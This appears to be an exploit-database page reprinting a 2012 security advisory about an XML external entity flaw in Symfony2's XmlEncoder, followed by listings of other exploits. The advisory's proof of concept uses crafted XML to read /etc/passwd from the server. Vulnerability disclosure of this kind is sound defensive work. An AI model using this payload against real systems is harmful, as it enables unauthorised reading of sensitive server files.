Menu

Search for hundreds of thousands of exploits

"Symfony2 - Local File Disclosure"

Author

Exploit author

"Sense of Security"

Platform

Exploit platform

php

Release date

Exploit published date

2012-03-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Sense of Security - Security Advisory - SOS-12-002

Release Date.                 05-Mar-2012
Last Update.                 -
Vendor Notification Date.       24-Feb-2012
Product.                        Symfony2
Platform.                       PHP
Affected versions.              2.0.x - 2.0.10
Severity Rating.                Medium
Impact.                         Exposure of sensitive information
Attack Vector.                  Remote without authentication
Solution Status.                Vendor patch / Upgrade to 2.0.11
CVE reference.                  CVE - not yet assigned

Details.
The XMLEncoder component of Symfony 2.0.x fails to disable external
entities when parsing XML. In the Symfony2 framework the XML class
may be used to deserialize objects or as part of a client/server
API. By using external entities it is possible to include arbitrary
files from the file system. Any application written in Symfony2
that parses user supplied XML is affected.

Proof of Concept.
$serializer = new Serializer(array(), array(
    'xml' => new \Symfony\Component\Serializer\Encoder\XmlEncoder()
));

$x = $serializer->decode('<?xml version="1.0"?><!DOCTYPE scan
[<!ENTITY test SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/passwd">]><scan>&test;</scan>',
'xml');

var_dump($x);

// $x will now contain a copy of /etc/passwd base64 encoded.

Solution.
Upgrade to Symfony 2.0.11 or apply the vendor provided patch.

Discovered by.
Phil Taylor from Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-12-002.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2013-11-12 "Juniper Junos J-Web - Privilege Escalation" webapps php "Sense of Security"
2013-04-08 "Google AD Sync Tool - Exposure of Sensitive Information" local multiple "Sense of Security"
2012-11-30 "SilverStripe CMS 3.0.2 - Multiple Vulnerabilities" webapps php "Sense of Security"
2012-09-05 "Ektron CMS 8.5.0 - Multiple Vulnerabilities" webapps asp "Sense of Security"
2012-08-27 "Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload" webapps asp "Sense of Security"
2012-06-18 "QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities" webapps hardware "Sense of Security"
2012-03-07 "Iciniti Store - SQL Injection" webapps asp "Sense of Security"
2012-03-05 "Symfony2 - Local File Disclosure" webapps php "Sense of Security"
2012-02-23 "Snom IP Phone - Privilege Escalation" webapps hardware "Sense of Security"
2011-10-17 "WordPress Plugin BackWPUp 2.1.4 - Code Execution" webapps php "Sense of Security"
2011-09-20 "NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery" webapps hardware "Sense of Security"
2011-09-19 "Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities" webapps hardware "Sense of Security"
2011-07-20 "Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting" webapps jsp "Sense of Security"
2011-06-18 "Cisco Unified Operations Manager 8.5 - '/iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Sense of Security"
2011-06-18 "Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Sense of Security"
2011-06-18 "Cisco Unified Operations Manager 8.5 - 'iptm/ddv.do?deviceInstanceName' Cross-Site Scripting" remote hardware "Sense of Security"
2011-06-18 "Cisco Unified Operations Manager 8.5 - '/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities" remote hardware "Sense of Security"
2011-06-18 "Cisco Unified Operations Manager 8.5 - 'iptm/advancedfind.do?extn' Cross-Site Scripting" remote hardware "Sense of Security"
2011-05-20 "PHP Captcha / Securimage 2.0.2 - Authentication Bypass" webapps php "Sense of Security"
2011-05-18 "CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal" webapps java "Sense of Security"
2011-05-18 "CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting" remote hardware "Sense of Security"
2011-05-18 "Cisco Unified Operations Manager - Multiple Vulnerabilities" remote windows "Sense of Security"
2011-05-18 "Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting" remote hardware "Sense of Security"
2011-04-15 "cPassMan 1.82 - Arbitrary File Download" webapps php "Sense of Security"
2011-03-28 "WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution" webapps php "Sense of Security"
2010-12-20 "Elcom CommunityManager.NET - Authentication Bypass" webapps asp "Sense of Security"
2009-08-12 "Plume CMS 1.2.3 - Multiple SQL Injections" webapps php "Sense of Security"
2009-06-30 "XOOPS 2.3.3 - 'op' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Sense of Security" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected